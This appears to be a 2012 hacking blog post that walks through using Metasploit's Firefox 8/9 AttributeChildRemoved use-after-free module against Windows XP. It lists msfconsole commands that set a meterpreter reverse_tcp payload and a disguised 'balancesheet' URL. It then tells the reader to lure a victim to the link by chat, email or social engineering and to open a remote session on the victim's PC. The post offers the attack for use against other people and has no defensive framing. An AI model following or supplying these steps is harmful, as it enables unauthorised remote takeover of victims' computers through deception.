Banner 480

Senin, 14 Mei 2012

Hacking Windows XP with Firefox 8/9 Attribute Child Removed() Use-After-Free

This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1. Removal of child nodes from the nsDOMAttribute can allow for a child to still be accessible after removal due to a premature notification of AttributeChildRemoved. Since mFirstChild is not set to NULL until after this call is made, this means the removed child will be accessible after it has been removed. By carefully manipulating the memory layout, this can lead to arbitrary code execution.

Exploit Targets
Mozilla Firefox 9.0.1
Win SP2

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/windows/browser/Mozilla_attribchildremoved

Msf exploit (Mozilla_attribchildremoved)>set payload windows/meterpreter/reverse_tcp
Msf exploit (Mozilla_attribchildremoved)>set lhost 192.168.1.3 (IP of Local Host)
Msf exploit (Mozilla_attribchildremoved)>set srvhost 192.168.1.3 (This must be an address on the local machine)
Msf exploit (Mozilla_attribchildremoved)>set uripath balancesheet (The Url to use for this exploit)
Msf exploit (Mozilla_attribchildremoved)>exploit


Now an URL you should give to your victim http://192.168.1.3:8080/balancesheet


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Banner 480 bawah




Your Clicks! Your Earning!